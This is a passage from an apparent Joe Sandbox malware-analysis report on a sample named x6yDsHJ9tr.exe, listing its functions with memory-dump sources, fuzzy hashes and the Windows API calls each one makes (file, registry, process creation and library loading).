Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45

Function 004073D6 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45

Function 004070EC Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45

Function 0040703F Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45

Function 0040715D Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45

Function 004070A9 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45

Function 0040347E Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403492

Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
SetFilePointer.KERNELBASE(0010A7C7,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D

Function 00403376 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C

Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
RegCloseKey.ADVAPI32(00000000), ref: 00402464

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D

Function 00405BD6 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
GetLastError.KERNEL32 ref: 00405C26

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9

Function 00405C65 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C

Function 00406A76 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79

Function 00406172 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
